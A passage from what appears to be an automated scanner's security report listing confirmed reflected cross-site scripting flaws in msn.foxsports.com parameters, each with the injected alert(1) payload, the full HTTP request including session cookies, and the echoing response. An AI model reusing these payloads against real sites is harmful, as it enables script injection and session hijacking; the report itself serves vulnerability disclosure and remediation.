       if ( response.errorCode == 0 ) {
       //alert('Success');
       // Now forward this window to the forwarding URL:
       var forwardingURL = '/80af3';alert(1)//c6e152d015f';
       
       // NB: special logic for if we're calling this from within MSFT's iframe:
if(window.parent){
window.parent.location = forwardingURL;
       } else {

...[SNIP]...

3.4. http://msn.foxsports.com/account/transition [initiatingAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the initiatingAction request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d5c'%3balert(1)//7b32f916187 was submitted in the initiatingAction parameter. This input was echoed as 50d5c';alert(1)//7b32f916187 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification50d5c'%3balert(1)//7b32f916187&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=0145CBDF2E0FD7B8BBEC5691C9CAAB32; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:32 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!-- END: Gigya client defs -->

   function onLoadHandler() {

       var initiatingAction = 'verification50d5c';alert(1)//7b32f916187'; // right now, either "registration", "verification", "login" or "logout"
       
       <!-- BEGIN: Gigya call -->
...[SNIP]...

3.5. http://msn.foxsports.com/account/transition [ts parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the ts request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 448ad'%3balert(1)//5d5d5f1d08e was submitted in the ts parameter. This input was echoed as 448ad';alert(1)//5d5d5f1d08e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634448ad'%3balert(1)//5d5d5f1d08e&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=595CA7DAE1C347A219B907C529C4E2F9; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:37 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!-- BEGIN: Gigya call -->
       
       var EFSUID = 'p/k94ON71KoD/EYqOMDzIDg==';            
   var dateStr = '1294446634448ad';alert(1)//5d5d5f1d08e';            // Current time in Unix format (i.e. the number of seconds since Jan. 1st 1970)
   var sig = 'KagpkMXaJne3LURVdXcQmhrRR28=';                // Signature based on siteUID and dateStr

   var params={

...[SNIP]...

3.6. http://msn.foxsports.com/boxing/gallery [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /boxing/gallery

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 876c5'-alert(1)-'117182e5aaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boxing/gallery?876c5'-alert(1)-'117182e5aaa=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 220967
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 08 Jan 2011 01:18:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/boxing/gallery?876c5'-alert(1)-'117182e5aaa=1';

       startComments('StoryComments', '209'); // load up team comments
   </script>
...[SNIP]...

3.7. http://msn.foxsports.com/boxing/odds/moneyline [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msn.foxsports.com
Path:   /boxing/odds/moneyline

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 17502--><a>7c62d5583cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /boxing/odds/moneyline17502--><a>7c62d5583cc HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 179220
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=27
Date: Sat, 08 Jan 2011 01:19:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<!-- esi: /nugget/10088_209_moneyline17502--><a>7c62d5583cc_boxing-->
...[SNIP]...

3.8. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611 [gt1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

Issue detail

The value of the gt1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbd9e'-alert(1)-'7cb6c89dc04 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611?gt1=39002cbd9e'-alert(1)-'7cb6c89dc04 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 244677
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=29
Date: Sat, 08 Jan 2011 01:13:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
pt>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611?gt1=39002cbd9e'-alert(1)-'7cb6c89dc04';

       startComments('StoryComments', '24828042'); // load up team comments
   </script>
...[SNIP]...

3.9. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dd92'-alert(1)-'c38e52b2865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(1)-'c38e52b2865=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248882
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=C19EFDA1529F318D4DF0EBF807C6C548; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=52
Date: Fri, 07 Jan 2011 21:52:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(1)-'c38e52b2865=1';

       startComments('StoryComments', '24821005'); // load up team comments
   </script>
...[SNIP]...

3.10. http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e7a8'-alert(1)-'2ad1a22d113 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611?9e7a8'-alert(1)-'2ad1a22d113=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 242053
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=62875BBB2A5D21448AA0F658C82DA2CB; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=130
Date: Fri, 07 Jan 2011 21:53:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611?9e7a8'-alert(1)-'2ad1a22d113=1';

       startComments('StoryComments', '24828000'); // load up team comments
   </script>
...[SNIP]...

3.11. http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby- [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /horseracing/story/the-road-to-the-2010-kentucky-derby-

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7322e'-alert(1)-'6457fd1c49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /horseracing/story/the-road-to-the-2010-kentucky-derby-?7322e'-alert(1)-'6457fd1c49a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; 